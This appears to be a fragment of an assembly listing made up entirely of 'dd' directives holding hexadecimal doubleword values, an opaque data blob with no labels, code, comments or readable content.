dd 68D84982h, 2598D550h, 3CA8A000h, 0BEA255D3h, 0FA90F1h
dd 67509573h, 0CC3FFDC8h, 84811C00h, 3CB3C7F4h, 0D54004Bh
dd 3DE8D27Eh, 0A801FB72h, 16B43446h, 0F940DEC4h, 15CA650h
dd 0B0765D33h, 0C03698EEh, 0E20020E5h, 46BAD68Ch, 9DF9B8Fh
dd 5863BC05h, 0D45CB080h, 97004454h, 522CDAB3h, 0FCFBB47h
dd 0E2A93A66h, 7B0B2F40h, 723F43A5h, 8500F8C6h, 319C39C9h
dd 680C8h, 22DB8FA7h, 691EAE88h, 0EF785A1Fh, 0B9604401h
dd 74D87F19h, 672B0063h, 0E4955ECDh, 9DEEAB73h, 0F0006CFEh
dd 0E622C90Ah
dd 37784Bh, 500B28F9h, 341F3FE5h, 0BE6F7224h, 5D73F100h
dd 10F836h, 0A77ECA1Ah, 46823FB4h, 0EB96D102h, 0C3880826h
dd 6015DA4Ah, 8730B4h, 93F63DF4h, 5FC210E3h, 73142A00h
dd 6ECF9CA0h, 495C01A4h, 62116497h, 92FFECE5h, 797F8E00h
dd 69861235h, 9EBA0363h, 0BC627AEh, 30BF3AF9h, 0CDEA5814h
dd 0E7C1ED00h, 8B7351D8h, 595C04FAh, 804CCE05h, 0B2CFACB0h
dd 7D5EE11Ch, 267B00F8h, 0CE4D544Ah, 1CD00D8h, 7A9BE645h
dd 0E900717Ch, 1AD06EFCh, 39533110h, 0DA009460h, 1674EB9h
dd 6E0EEB5Dh, 80482971h, 9F653856h, 9D6F66Bh, 7264F689h
dd 15194180h, 540053A8h, 0E9236CC2h, 75CB225h, 329E2FF8h
dd 660C30A6h, 0C91DDD0Ah, 29CECE7Dh, 91692797h, 0A0BD61E3h
dd 0FBDE7Ch, 485280F3h, 908C843Bh, 0F827F40Eh, 0D4ADC016h
dd 34E14BCh, 0D2FFA85Bh, 0CE88B19Eh, 541E7F24h, 0AC00EC05h
dd 0CA44271Bh, 0E1C00E8h, 9703C149h, 770070EBh, 24829F6Ah
dd 0A67933h, 0E6C841C7h, 38CA7642h, 0DE14BD00h, 0CE3D74Ah
dd 71950E15h, 0D3409E13h, 8406034Bh, 4D5C9400h, 62FBA3C4h
dd 18710024h, 0E6D01088h, 0F9006547h, 0FF85547Ch, 0D8D305h
dd 0A8B9C664h, 300CC979h, 1D6A1200h, 24F6EA85h, 4CCFF60h
dd 0E7770E11h, 7C86B2B1h, 0FA00FE0Ah, 1FD40CD7h, 7E2EDEFh
dd 0BA1C9F06h, 0D20A908Bh, 7B00B340h, 7E1118E0h, 75147Dh
dd 0D3270488h, 5F2855ECh, 45A32601h, 0A496FEEFh, 0FDDDDCh
dd 5B652962h, 97AE2A1Bh, 160191F2h, 9E795DC6h, 8EC219CCh
dd 0F13A9EFh, 9328A0A8h, 0B8DD80h, 3E01D2F7h, 433D8C6Ah
dd 9D18B200h, 0A5BB8139h, 392B988Bh, 6F80F1A9h, 1038DCAFh
dd 0D900DB9Ch, 0E3B8F653h, 0CC971Eh, 0C72CEBA1h, 32BA4BF4h
dd 0D3F21100h, 103BE4EFh, 18F8E0h, 7C8B4FEEh, 0BEBB3C56h
dd 43130100h, 5DFD26F8h, 0DA6300A5h, 0DB6557F7h, 5B00AAB4h
dd 8772CAB9h, 0AB704Dh, 0C89399E6h, 0D7383528h, 4C85790Eh
dd 1D50E0CAh, 230EC4h, 0FCCD9630h, 38AB2C95h, 68BBAF00h
dd 35F6658Ch, 404100CFh, 0A86261E3h, 34783ABCh, 93B6F00h
dd 79941D90h, 21FC06A7h, 38717EEDh, 0F480A812h, 0D2EB0D00h
dd 37C2AFh, 9AE83B15h, 68A5C3F2h, 0FD7B6403h, 88D8F0EAh
dd 3F714240h, 129F1570h, 0DB1340B7h, 6251B481h, 9C074EE4h
dd 0C1E6C0F8h, 5AB9ED50h, 0CDC2004Fh, 6AAB8861h, 13007A53h
dd 0D0867E30h, 0D6A1E2h, 3532040Ah, 70B9B055h, 4EED1C00h
dd 31C5FC08h, 5D2700F7h, 6718B57Bh, 0A40B1D4Ch, 0DD39F4h
dd 0FAEC4D47h, 2B320F92h, 71C0B470h, 3AB35443h, 778CAE00h
dd 35F3A228h, 270300EFh, 7BB91DD1h, 0B1009070h, 3FADDA2Fh
dd 0BE36A9h, 0F9689C7Ah, 2248F40Dh, 1021D200h, 64655BC5h
dd 0C4FF00DEh, 6D58D69Fh, 0CE004215h, 0F039914Dh, 3990429h
dd 0A9AC2DE0h, 0BC8064A4h, 3F00BE7Bh, 0F953E25Fh, 5074E5h
dd 16A59A6Bh, 381244E9h, 0EC48B200h, 0CC206FE6h, 8F280066h
dd 3BD8FCF9h, 0DD00474Bh, 1076F688h, 170CBC7h, 7A14A281h
dd 0C05DCDB8h, 0F7002C3Ah, 6944DF25h, 7D5759Ch, 234BAAE2h
dd 0F259509Eh, 7400C933h, 0F918146h, 90669363h, 0D8F50609h
dd 90148B92h, 6FD01E1Fh, 8E23FC00h, 36DCBEFh, 726884F4h
dd 0A0A843E4h, 0FF007365h, 44B86270h, 758AC28h, 259E2C1Ah
dd 475AF017h, 0F53EC552h, 90A280EEh, 43831D73h, 8D690037h
dd 7B63A692h, 7400D193h, 0DBBC62B6h, 3D09B2C2h, 3A8794F4h
dd 0E04C22A2h, 549D5D8Eh, 81002470h, 0E586184Fh, 0E73932h
dd 0A62367C5h, 7C88D1FBh, 2EBF0D0Eh, 704F83CAh, 3D16D065h
dd 6BE657h, 0D9DEF2A3h, 4CFDE05Ch, 5D003AE8h, 60D22C4Eh
dd 6EE8D4h, 0DA56BC2Fh, 3A6C86Bh, 331E41ECh, 0A380903Ch
dd 48A759B5h, 0CD0F3A1Fh, 31C2748Eh, 0D866D100h, 9E05971Bh
dd 2B6A372Ah, 0CFC531C0h, 42B60283h, 0B7365EC1h, 0CB781140h
dd 0AD1C4A00h, 70A725F9h, 0E2FE0004h, 0D83F0ECEh, 560EFD39h
dd 0C0B1E413h, 0A948F62Bh, 0B66B1F85h, 46F9002Ah, 61E63506h
dd 5FAC7E04h, 0C9C072ADh, 5D641Ch, 0D5137407h, 0AFCA9B9h
dd 37774A01h, 0F8843E05h, 159F7C0h, 6A705685h, 0CB1F1D5Ah
dd 0E3CA1B80h, 16BBA500h, 0D8C448C8h, 323502E2h, 508A4E62h
dd 791B2040h, 137C1600h, 1C98F2Ah, 12850029h, 4E6F39AFh
dd 7E0E4458h, 8051D53Ah, 3D7CB89Ch, 4B9A02B3h, 935DC7E1h
dd 891E4CC0h, 0C9604C00h, 59E1FD9h, 0D6E8077Bh, 55ED38DEh
dd 54EBC3EAh, 440EE097h, 2E005DB7h, 0E6654AE7h, 9AC4DABh
dd 6CB394C8h, 0D8431080h, 2101FA05h, 0CA3C535Ah, 8FE8117Fh
dd 51C500D6h, 3AB4E84Ch, 0DA009717h, 2F296DD1h, 1F99DEh
dd 69DD2E3Eh, 6BB3A407h, 38C9F700h, 49BCC762h, 0F07BEE45h
dd 974B0057h, 9C3236A4h, 1EF8EE23h, 523ECF00h, 947571F9h
dd 423700B2h, 842AC814h, 0E500AAD7h, 0F3CB0B7Eh, 0B0A3FB36h
dd 0ADF456h, 73568A71h, 0CE70EECFh, 0EB548800h, 4C8E76E7h
dd 5082E611h, 1C0CB4D8h, 8031EDFBh, 75B5A12Bh, 0E3002F36h
dd 0E14CACBh, 174135h, 0E5C15068h, 7EADD9ECh, 0EADC4D00h
dd 9340CF75h, 746F7A7Bh, 0A5020017h, 0D36A4990h, 480320BAh
dd 912B52D5h, 0C3D0F822h, 989C76EAh, 3DAE0027h, 847481B8h
dd 4000F46Ah, 268A2BD3h, 0FBFCEEh, 0FD249B0Ah, 2DC6135Fh
dd 5D9DBE00h, 0DFA26D63h, 0B95400D3h, 2CA696ACh, 0A307618Fh
dd 1CFB47DBh, 7C084670h, 77600058h, 0C1D60C3Eh, 0B63CD5E0h
dd 0BA930F98h, 0CC4B40F8h, 8A134Ch, 0F588AB45h, 6F62AC47h
dd 51FE2200h, 0D441CAFh, 0C6710023h, 0D9E098A6h, 5007297Ah
dd 0C9DA8C02h, 3C6AEF50h, 96FCD5h, 33AC2769h, 495E9B56h
dd 42787000h, 6658FC0Bh, 75790E0h, 513BDE6Fh, 0C8E8700Ah
dd 120028A0h, 87E6305Ah, 24C5CC37h, 0DE5263h, 79786A2Eh
dd 0F507C86Fh, 0ACAA1EB7h, 0F8C0A305h, 5353065h, 917025EEh
dd 724480D6h, 0CC02186Dh, 90AF3AD5h, 0C57DC051h, 6831F6Eh
dd 0D1A44093h, 0F9CAF66Ah, 0E2480A1Dh, 23ACEC0h, 0C6979Ah
dd 1ED3D80Fh, 0FAE42C1Bh, 8A00A277h, 4B877C94h, 0B73EC3h
dd 6E679C5Ch, 18CFA0C0h, 9D0798B8h, 135A6B3Ch, 2F683591h
dd 1F07F0h, 0F6D8C9B2h, 76ED7CD7h, 0D22CB00h, 86DB110Ah
dd 0F12CFC94h, 738D3C0h, 0DFA06B7Ch, 3125A01Fh, 9A00F4F5h
dd 1E92F37Ah, 0FFD0562h, 729AF23h, 5BD58641h, 0E488408Ah
dd 30E476C6h, 0E6483300h, 8E8D6198h, 0D04E002Fh, 6A5870E7h
dd 9500E2F1h, 0E8AD40F5h, 5417A4h, 672CD280h, 87B7CCDDh
dd 0B185DC00h, 0C0E11B9Ch, 0F7011D4Ah, 0EC6C0097h, 4DFEEB20h
dd 0EEC7D200h, 0DCD5E8B2h, 69503C66h, 9880FC80h, 19709ED9h
dd 65BC1B0Fh, 0DB42839Ah, 1373901Ch, 0E1FD0071h, 55DE349Eh
dd 0C3A16BE8h, 0AEAA818Ch, 5C4EF672h, 7DDAECh, 0DBD90896h
dd 0B8BA3BA1h, 0A3C0F400h, 85E67B3Ah, 9420079h, 0A9968B99h
dd 339F964h, 41A600CEh, 0E9E6F128h, 0F77E0139h, 953A8A18h
dd 5A55C814h, 63C30A00h, 0FF8E99AEh, 709000A6h, 0BA061E8Dh
dd 39005BFCh, 4732660Ah, 26421Ch, 0EC367BB8h, 1D8FCFEBh
dd 0E52F3B00h, 0BE5784D7h, 0DDD50EFBh, 0D8E0291Eh, 734480A7h
dd 0E6DBA200h, 388ACCE3h, 72C21CA8h, 76E80012h, 1B441525h
dd 41E7D500h, 0C8D34E0h
dd 0A25E1F46h, 280E80BDh, 4CECCF6Ah, 505F1000h, 0D87136E5h
dd 9DD10065h, 0B9C514D4h, 0A01C99A6h, 0E88027F9h, 0DB3BEB07h
dd 0A4E206DAh, 0C0F27D6Eh, 3C45B813h, 597A7500h, 1B4BA84h
dd 552DA654h, 0E46A6B32h, 5100766Dh, 4B8EC610h, 281463h
dd 55E10229h, 0C89194FDh, 9CF09FA0h, 23613600h, 0C2E7F815h
dd 9F83001Fh, 0C41D766h, 0BFEE6FC7h, 96E93Fh, 34E4D93h
dd 0CA2C72h, 0D3E8E5C9h, 513994DAh, 6E000472h, 28226297h
dd 0E795971h, 2AEAE185h, 0CF9D8063h, 260746F8h, 0CDB71C04h
dd 6808EDAh, 0B4622Dh, 922AE515h, 0DB375734h, 0C50090B8h
dd 19225D9Ah, 39F3BAh, 7732606Bh, 72636E8Ah, 7B21CD01h
dd 0B5F63CCCh, 804920h, 74ED8F8Bh, 87FB3962h, 330040FAh
dd 2D2444A4h, 0E54B9Eh, 0FD3A27BBh, 4D02CC62h, 7C01EB00h
dd 0F20BF873h, 0FEF0078h, 5A7B5910h, 2800838Fh, 0DDDB8DFEh
dd 3B57E50h, 0AAC156EEh, 3FB096A1h, 470177C6h, 78FD5AF9h
dd 9760D225h, 0DAB300D1h, 44EF0EE1h, 0C00A48Dh, 0B2CB394Fh
dd 2AEB83h, 5879613Ah, 12990BCh, 0FEE77301h, 8C64B07Dh
dd 7D5E1D4h, 0E90B0AC1h, 0F04CB3B1h, 7DA43Ah, 0F1672A07h
dd 70A1F7E5h, 0A460008Bh, 0CFC9B19Ah, 4373A8D5h, 0A9929500h
dd 2704D02Bh, 0AD1900F8h, 0C10F2F96h, 560064DCh, 86EB8425h
dd 1D0E7AF9h, 5FD352F8h, 0C83240EFh, 0C9197FDFh, 0CDC42300h
dd 3FD14927h, 85D60080h, 8663DB34h, 4807DD11h, 6FABD4BDh
dd 0B4877320h, 0FC8001B8h, 75A3DC1Eh, 5CD6D027h, 69BB2500h
dd 8AC8FF9Ah, 20BF0E5Eh, 3D60991Fh, 0E7537C98h, 8BB56D01h
dd 6EAC08CAh, 3B144ACCh, 9C03D3AFh, 9E7661F1h, 62D0B5E0h
dd 0DD0083F8h, 5C775FBCh, 0FDF222CAh, 0F6889CCh, 1FA6BA1h
dd 490A33A0h, 1900ED74h, 8B6414A2h, 4DB89Bh, 956AFEE2h
dd 0ECBBCC60h, 0C300657Eh, 0B9C4651h, 6D554Eh, 90278B56h
dd 0E68E6A76h, 54ECBF03h, 0B8AE7D73h, 0E1D706h, 63F5B570h
dd 67A95579h, 4443F900h, 0D774E635h, 0FC5900C4h, 24BE11B7h
dd 62989480h, 15D61B1Dh, 1DA5EF00h, 796EE0h, 0C8F145D2h
dd 0DF2FD988h, 0BA5E0A00h, 0A511483Bh, 4BE200B5h, 9F93A47Eh
dd 2C0EF835h, 0C0270DC1h, 18625425h, 1EE10798h, 802E15A8h
dd 0C1C3AECBh, 0F8E2CD00h, 48453F79h, 827A0E9Ch, 876088B6h
dd 95FCF7FEh, 3986B80Fh, 4336CFDAh, 884DF390h, 9756C2h
dd 30A3874Bh, 2C78A8F4h, 92D71800h, 0E7843151h, 0D64E0FC1h
dd 3F60BBA2h, 6D29A3DBh, 0A7005275h, 0E5FE4557h, 7BA4784h
dd 91B72E6Bh, 0D09AA7CCh, 0BD66F84Ah, 71A4D800h, 769CFFC1h
dd 11B000C8h, 0AEDC241Bh, 0CF0074A7h, 4CDB4B16h, 3956E2D3h
dd 0B980EC59h, 236734D7h, 2C002D94h, 0C4DCD1EEh, 0E463BDh
dd 91BB340h, 0C73C91CFh, 80040E38h, 0C59A413Ah, 172C173h
dd 0D2D7D034h, 204EE424h, 8C012ECDh, 0BCD705Bh, 187008E8h
dd 0CE7D95h, 4451E23Eh, 167A807Fh, 80F0F339h, 19CA82EBh
dd 6694D5h, 2F01A5BCh, 27A797CEh, 0FCB15824h, 80198B0Fh
dd 8988AC2h, 5B1139E1h, 0BB556180h, 66B5A30Dh, 0BD03690Eh
dd 2ACC4083h, 0D4D170h, 7C6ADC80h, 0E664A125h, 0DE198F00h
dd 7823ED01h, 0A45E0392h, 29BD493Ah, 9F07B4C8h, 0DEE89900h
dd 755406F9h, 16871786h, 0F46F00ECh, 661A5527h, 57569F00h
dd 3D52CC02h, 1E9900D4h, 636C4C70h, 4304651Dh, 1B0A2AB4h
dd 0C361DC0h, 0C680B5E7h, 53397408h, 46026500h, 0D8AFCA7Ch
dd 2A400058h, 93ED6028h, 3B00295Ah, 0AC9A1619h, 0B46DE9h
dd 1191C001h, 2301308h, 0EF7F8600h, 2F8316ADh, 97D4004Bh
dd 0DDCF31CDh, 0E4747A11h, 0A4EA9C03h, 0A0C4E824h, 398AE74Eh
dd 5A808E58h, 2CAF34AAh, 80EAB53h, 20197828h, 0EC26A17Bh
dd 2ECC01D1h, 42A71C80h, 10522048h, 62255403h, 80FBB884h
dd 0E0184486h, 0E970001Bh, 0FAC2DC57h, 6400BF17h, 0F5B850D6h
dd 5CDBACF7h, 24013295h, 17D3F8CEh, 0EA88D49Fh, 8EA54A38h
dd 0E090FB8Fh, 5CFA7D94h, 2BCF0049h, 7C0ACCA6h, 9E004E89h
dd 0C1C3DD5h, 9C373Ah, 86262184h, 4E5A3579h, 72491300h
dd 0BDC31819h, 651C00EFh, 54528712h, 6400DDE7h, 9E9F457Ah
dd 4CB4D0F1h, 796F02h, 4D7E1FD5h, 4D6C52Eh, 0F32F9013h
dd 0BCFF0101h, 2BE8241Ch, 783B1C28h, 42FD8116h, 403A1E18h
dd 191F60B8h, 4F6C4A07h, 572050CFh, 0C26210h, 864424B0h
dd 0F12DE8E3h, 3F9EF448h, 0DEBA80CBh, 0BC16FD8Ah, 36760Ah
dd 0A22B3037h, 989DD233h, 0C0BD6001h, 7B1CFA57h, 1A9E4DCh
dd 3FA4D9DBh, 0F05161F5h, 0E50C9878h, 83D934Bh, 9F7B3B6Ch
dd 0F2589900h, 2EB42D31h, 0F7E33600h, 0AF89BC01h, 93C93DE6h
dd 7649A480h, 38DACE66h, 30075E00h, 0F30641A5h, 0BD7FE4h
dd 0F0FADC48h, 54AFEB58h, 240FF173h, 0A03D4B91h, 4E3FDBDEh
dd 1B57214h, 8404F307h, 0F8A253F9h, 0CA3C8E46h, 0B56F8016h
dd 1C3356E4h, 0AA9D0041h, 0C679082h, 4A00FB08h, 6FC973E7h
dd 0EB8188Dh, 76DDF55Dh, 22015EEh, 55D9A932h, 0DA63CA00h
dd 0EF849439h, 8AAD24E4h, 0DC410049h, 7A1B0B3Ah, 99BE6F00h
dd 1904A8F3h, 0CFC1001Dh, 0F9B64633h, 70000116h, 0B0900B1Ch
dd 7B95FE47h, 916107FCh, 80EF307Bh, 5A067879h, 4B68E6A0h
dd 0F0FEBA07h, 5780E38Bh, 0E80A7281h, 1FE80047h, 7DB39865h
dd 0C5035627h, 0FEF2AC58h, 0DE44E819h, 0C7C20013h, 33EB158Eh
dd 0CE1EBBB6h, 48C089AEh, 3BCA2A2Bh, 0E0AB0F6h, 0C066A537h
dd 3C8F5126h, 0F0FCA20Eh, 0C27AE734h, 0C83E0643h, 6CBDC5h
dd 1D571526h, 0D3AB6AC4h, 0F500877Ch, 8FB8FDE8h, 0F9277h
dd 0FA343AD8h, 3B0894F8h, 8EC25F03h, 0D0448DCCh, 0B14BC3h
dd 0AE26EA71h, 0B7E879E3h, 89FC1400h, 0D11BF57Ah, 0F9FCCBh
dd 0C1ADF3A0h, 5A243A3h, 0CEBCA0Fh, 2DFD6384h, 4C389812h
dd 7713005Eh, 1857450Ah, 2E0095E9h, 756AE11Ah, 0A34FBDh
dd 4B9C264Dh, 0E8CE5D42h, 4023C204h, 10803ABFh, 1FA3ADh
dd 0E633ECC5h, 80012192h, 4CC0EB00h, 19870F47h, 0E1BE00FEh
dd 5093A172h, 0CC00C731h, 5878B4DFh, 5034D6Eh, 74122EBFh
dd 187AC024h, 0F3F4B9B7h, 0E669300h, 3FF930A4h, 0DA7423h
dd 0CE1085C1h, 3BD73745h, 99D28D00h, 298BAEC6h, 26E80087h
dd 0E71D5D36h, 0F4F36415h, 0C200FB6Ah, 1ED62BF5h, 0B872DAB0h
dd 0D477006Eh, 9289A519h, 0AC0078AAh, 0B31DA2D1h, 6B02B9h
dd 9C1E231Ch, 1810BA5Dh, 1B8E2600h, 2F9E16B6h, 0B8350012h
dd 5B3FA137h, 6700C172h, 0ACF4BDEAh, 7C64B656h, 0E2EAB9h
dd 0E3B87AD4h, 0EF7B1363h, 0C70F0E0Eh, 339E04Ch, 1DD8DBh
dd 0FECA28E2h, 211FAFCEh, 81A23200h, 0C7341AB4h, 44CD00D9h
dd 84242714h, 3C00B11Fh, 51D59605h, 93A2D7h, 0CCC66E6Ch
dd 943DA304h, 0F3036D00h, 5F90309Dh, 75BF1CDFh, 0AA6A802Ah
dd 0A68969A0h, 0A9CEEC00h, 58681FFFh, 4DF53BE0h, 9282FC00h
dd 59421132h, 0C4D16407h, 5D10DCDAh, 3C8CC166h, 0C887AE94h
dd 0E06DB3E6h, 702474Fh, 3DFADD00h, 38C7B11h, 71C50059h
dd 0C43F73B1h, 3C001B18h, 7847C658h, 0EC14E6D0h, 0FD0412AFh
dd 30DC0032h, 0C907C16Ch, 0D9962C00h, 2E4209F5h, 0FDA103C3h
dd 1510E658h, 0DC7799A9h, 5C70E2ADh, 28024F07h, 6850A6F9h
dd 4AB847h, 0E43A9535h
dd 190B32FAh, 3114C100h, 65801FF7h, 71385CE0h, 0B1812500h
dd 14138943h, 0D900B97Fh, 0BE74ACC7h, 78ECDFh, 2E7C0F37h
dd 0D7551C3Eh, 5000B9F6h, 0B47DB10h, 0D66591h, 3AE921A1h
dd 3E05681Bh, 0A45BA000h, 6A6B0E83h, 211C0136h, 6E3F556Fh
dd 0E9E0DA64h, 0B900BEC8h, 531E728Bh, 24A79A3Ch, 0FC9DF8Ch
dd 0E5672DAFh, 3564D023h, 0B9000804h, 0A8884E67h, 553728h
dd 0DA149C19h, 0BBFC436Bh, 7FE6BD79h, 0B2281800h, 0CADE0345h
dd 42AA0030h, 3B1597EAh, 83F09BDCh, 0FD8E9500h, 0E29D217Ah
dd 2581005Fh, 49CD131h, 0B200A2ACh, 8CD1C13h, 1241B0h
dd 5FC1D0E1h, 3A383E5Ah, 5C507000h, 760EBE9Ch, 544700C0h
dd 0F58DF8EFh, 0A300D69Fh, 557F5932h, 3D4CE2h, 545A501Eh
dd 0AED57AE9h, 0B034E00h, 30DFAB57h, 0F9EA78h, 0EC1FB217h
dd 7154E108h, 0EDEE4300h, 0A57C5F7Bh, 9A7D008Eh, 5B633A75h
dd 0DF005796h, 40AA4673h, 71C33BA6h, 0C729007Dh, 50E4F1E0h
dd 0FB010525h, 8BBEC3Dh, 0DC703BD9h, 636A0069h, 71C4F820h
dd 40011062h, 0A65B3DDBh, 7CFCF4E3h, 27DA037Ah, 0C44B500Bh
dd 0C13535E7h, 0E9D29EC9h, 0C53E203Bh, 0D69BC600h, 2FC16DA7h
dd 2CA2004Ch, 187E7AC3h, 0BA00E75Bh, 3F4E289Ch, 98EAB70h
dd 9DEA52AFh, 54F04183h, 1D0038DEh, 29D25A76h, 7B98EEh
dd 43219CA2h, 2C637FC2h, 6900E5F8h, 0CD89E152h, 1C9D8FF3h
dd 0C28AB927h, 3C9AE96Ch, 0E455F7C1h, 7A00B328h, 60838762h
dd 2C6B972Ch, 89DBFh, 4A178FC2h, 0DA12795Dh, 9900E87Dh
dd 0F7ABA268h, 0C0070049h, 0E0BAD669h, 5D009E53h, 15C23C22h
dd 780246DDh, 5BC800E5h, 9E4F9C1Dh, 1A0F05BCh, 81C98A42h
dd 0A116E79h, 6A6E007Ah, 0D1FCC69h, 0F23DE800h, 0F8EA51B7h
dd 885D00D8h, 2C577007h, 6624B9A5h, 0C2001B2Eh, 0C47D9DFCh
dd 0C7BE0726h, 0E0154DFAh, 111CB3BAh, 8A6F4600h, 0BCDC6A7Eh
dd 0AAB900CFh, 0AC28F6DEh, 6C009D2Ch, 0EAC1822Eh, 0E08DE9A5h
dd 0FFE3070Bh, 0A0470376h, 7A3BAD61h, 0CFCE0600h, 5F4AC83h
dd 1EF90067h, 0BB40F78Eh, 0C807444Ch, 6D07F189h, 50B0CBA7h
dd 70A158h, 0C641CEC9h, 0D51DAFFAh, 3AE26F07h, 1C80BB2Dh
dd 0DA54B9h, 0CE832BF8h, 0DEE51902h, 7825C400h, 9E845F03h
dd 38880115h, 0AA96929h, 0E431DDD9h, 3C0F0CB8h, 0A05A0436h
dd 18AF1AB5h, 62A000DFh, 0DA65EE8Fh, 3507751Fh, 0BE0B7657h
dd 46F86080h, 2C781DCCh, 7D0540F5h, 0A8B78E75h, 66328400h
dd 0D62A1202h, 78C23BFDh, 0D4A678Fh, 35CE2200h, 0E900E129h
dd 0B2DC33A4h, 7FE46Bh, 546CDE90h, 0A6D8A846h, 8900A57Ch
dd 2523CD30h, 1C5F38h, 7AED8AD9h, 80767C0Bh, 0E3E2B2F6h
dd 3668B800h, 0D66C34D1h, 0F4A67FE0h, 4E1C0EE2h, 81E0B130h
dd 3964F50Bh, 2CCC7D00h, 1B92136Ah, 51CE0056h, 3A621091h
dd 0EF009B52h, 671537A3h, 7388BFh, 69D79529h, 17500EC3h
dd 93FBDA00h, 37D3A684h, 3E920070h, 3DC26FB6h, 6400DDCCh
dd 472ECF54h, 0A66987h, 49EE585Eh, 0D6F4F175h, 1E1C9EE6h
dd 0B300FF88h, 7CC26C6Ah, 94E6A04Dh, 20F00B7h, 633B534Eh
dd 340E1FE5h, 0E331F5A4h, 0C8950638h, 5CF0A8h, 79016D29h
dd 0F862E626h, 9283300h, 0D1F6313Eh, 63390719h, 80705B55h
dd 1B6516F7h, 0E190CB01h, 0A95783C7h, 5A8FF8C7h, 0F98500C0h
dd 0B06CC2B4h, 0CD004ABFh, 43508C63h, 50B837F8h, 74AEDCh
dd 0F7D9B5E7h, 3BF29907h, 0C73F6800h, 79125B78h, 83AC001Ah
dd 909CE1F5h, 0E41305C9h, 65009DBBh, 0F7CFE2F0h, 7AAA00A6h
dd 0E3BD3ABAh, 4200D0C1h, 0F5324551h, 57B499Eh, 0B91537Ch
dd 6F35C00Dh, 0D10F6867h, 0A0868FF1h, 0F6A364EDh, 89821DF4h
dd 0FCF5CF8Bh, 0F07ED601h, 0A171F855h, 474E3Fh, 0F3A09FC5h
dd 0FD2932Ch, 90387A89h, 441C4B20h, 0E900746Eh, 0DEFC3A16h
dd 12E6A8h, 78791D80h, 0A56CC6D3h, 64161800h, 0CABE5223h
dd 96B703F4h, 0B83DA15Eh, 66459CC0h, 0C5638800h, 7E0E8427h
dd 1A3600BDh, 615644C2h, 0A0005372h, 59097F7h, 1E820Ah
dd 812249DAh, 4D8855DFh, 0D42F116h, 0DA84800Ch, 407A001Dh
dd 0F44B90F0h, 44C0A2E2h, 0A4B2CE39h, 9B17074Ch, 10E7036Ch
dd 6FD75BC3h, 3DC7800Eh, 5830E0AAh, 0E2DE0Ch, 0F4AEC8CCh
dd 49151CBBh, 1687C44Ch, 900972Eh, 79C765F9h, 0D4BA00C3h
dd 0CDD19E11h, 720021C9h, 7C052D98h, 70E49E4h, 6FF6E390h
dd 0D45910D3h, 0D50057E1h, 56F7A631h, 8EA83Ch, 10611BFEh
dd 835E50Fh, 3ABDA300h, 3B095B6Ch, 0C26E00C8h, 0A5FFEB32h
dd 8200905Fh, 8DC54556h, 46DE5Ah, 347F0AEDh, 0E8D0E929h
dd 8B166D00h, 545E835Dh, 1DAD0E95h, 0A240B75Bh, 96EEDDAAh
dd 4B4C700h, 0F5D011B5h, 0C8E138B2h, 7D8BFBB8h, 0B8033D7h
dd 2B7A45AEh, 7C3D9D00h, 0F4F0C835h, 9780008Fh, 0ED2D1B4h
dd 8017E99h, 75C4461Ch, 3A2C43h, 9AF91EBAh, 20008E2Fh
dd 0E0D79415h, 0B545ABh, 0B88632E7h, 27F47C10h, 411BA200h
dd 0D7F88CACh, 0F692012Fh, 804F61C1h, 8935309Ah, 633C2100h
dd 69448E70h, 73060022h, 0E12733C5h, 3000CFFAh, 9F68EAADh
dd 5C109C76h, 130926EFh, 0E280ED4Dh, 7A47165Eh, 0A478657Eh
dd 9FD8AD07h, 4E9088EEh, 15C4A40h, 14BF9CE2h, 0D4455DCBh
dd 410119CCh, 69300175h, 54FC1E83h, 409E0074h, 0E82D5D97h
dd 0A094F84h, 80E681B3h, 0D8FF4E60h, 6B6D0018h, 0F223A557h
dd 0FA4C29BDh, 991900FEh, 0D95B652Ch, 0AF2F3813h, 5687BF38h
dd 40ABCCFFh, 0CB7F99Eh, 0D1D9FA00h, 0B4ED590Eh, 85D002ACh
dd 992FA83Fh, 0D88A7F40h, 4800D7F8h, 1C5A6C9h, 3ED532h
dd 0E1E827E6h, 0E4296991h, 6100EF73h, 38E7E2C2h, 50333Ch
dd 0AFA2782Ah, 0F884B1A5h, 9E698500h, 0F5795AFBh, 2FDB0025h
dd 4C7B47Dh, 5600EBBDh, 0A1A344BBh, 0FCE590h, 0F0EEA53Dh
dd 708C6297h, 0B4767900h, 0D0C47A42h, 1BB23F2Bh, 9088F800h
dd 96938467h, 0CC9BB900h, 18236013h, 6AF8E1F1h, 89BC00C0h
dd 8F944726h, 0D300AE6Dh, 0F4B70D48h, 7ECCC8h, 7CF7FC2Ch
dd 0EFFB47DFh, 0AF7A631Eh, 0D3C71B00h, 35D485Fh, 84448946h
dd 66E0D227h, 0BD1F59ADh, 0C5409E2Eh, 65DF0163h, 5BB20347h
dd 52C2C769h, 0B5899980h, 6C003770h, 88B6A806h, 79DAB4C8h
dd 2D6800A0h, 0AE82966h, 7E00ED9Fh, 0EFC34F0Fh, 0BF7770h
dd 786123DBh, 95F6FF5Fh, 4A00EDF0h, 59CC0776h, 3FB04133h
dd 6100BE16h, 0C11CC277h, 0B8006C6Bh, 0E4E0CF9Fh, 3A3F3260h
dd 8D97F672h, 0DFA8007Ch, 0A6019B2Dh, 0E55EA400h, 0BB1925Ah
dd 19D2006Bh, 46B9C93Eh, 581E4B5Fh, 98C00AA8h, 0FA6E69E0h
dd 0F3DF07FFh, 305B5A3Ah, 534DE404h, 2C153D00h, 0C3B59B6Fh
dd 8DBE3D8Bh, 8A366B00h, 0C7F3D46Ah, 74EF6724h, 625E9430h
dd 0E58403C4h, 9D54D6EBh, 0EC87B7F1h, 1F7F489Eh, 4F727D0Bh
dd 0EC8B06F1h, 17923AC2h, 275E9C07h, 0CF1ED07Ah, 0E401F418h
dd 448558B3h, 0AD70BD52h, 0E5680082h, 0AA388DCCh, 200029D2h
dd 2F93BBAFh, 7B96F7h, 1DC541A1h, 0B75A3413h, 0C38D8600h
dd 2CF079ADh, 2FDD0081h, 0AB0E569Eh, 6A00B06Eh, 8E83AEBBh
dd 94D646Ch, 0D1D65155h, 0CE808C0Fh, 0D37B59C8h, 0A7CD2A00h
dd 4B98DD07h, 0DEF0739h, 0B0956EB0h, 1AD7D656h, 3F004CE0h
dd 0A4A5FB08h, 6EE1C5h
dd 6D7F388Eh, 0C25B029Bh, 43BA970Eh, 99F0C0DDh, 1F2AC8B2h
dd 8026B0ABh, 30883A4Eh, 0DE01CE0Ah, 1C51FD0Dh, 9BFCF892h
dd 2DF40008h, 491E2353h, 8400FA8Bh, 5791694Bh, 673EC4h
